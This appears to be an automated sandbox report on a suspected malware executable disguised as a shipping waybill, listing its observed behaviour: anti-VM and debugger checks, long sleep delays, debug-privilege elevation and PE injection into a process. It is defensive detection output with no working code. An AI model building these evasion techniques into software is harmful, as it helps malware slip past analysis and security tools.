Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: 2E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: 94A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: 7DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: B4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: BA70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Memory allocated: CA70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe TID: 6804

Thread sleep time: -780000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

3_2_0040317B

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,

3_2_00402B7C

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Memory written: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Process created: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe "C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
